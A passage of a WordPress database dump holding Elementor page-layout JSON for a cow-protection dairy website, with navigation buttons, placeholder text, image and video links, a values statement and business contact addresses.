"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9066,1553,'_elementor_page_assets','a:0:{}'),(9068,1554,'_elementor_edit_mode','builder'),(9069,1554,'_elementor_template_type','wp-page'),(9070,1554,'_elementor_version','3.7.8'),(9071,1554,'_wp_page_template','elementor_canvas'),(9072,1554,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9073,1554,'_elementor_page_assets','a:0:{}'),(9079,1558,'_elementor_edit_mode','builder'),(9080,1558,'_elementor_template_type','wp-page'),(9081,1558,'_elementor_version','3.7.8'),(9082,1558,'_wp_page_template','elementor_canvas'),(9083,1558,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak 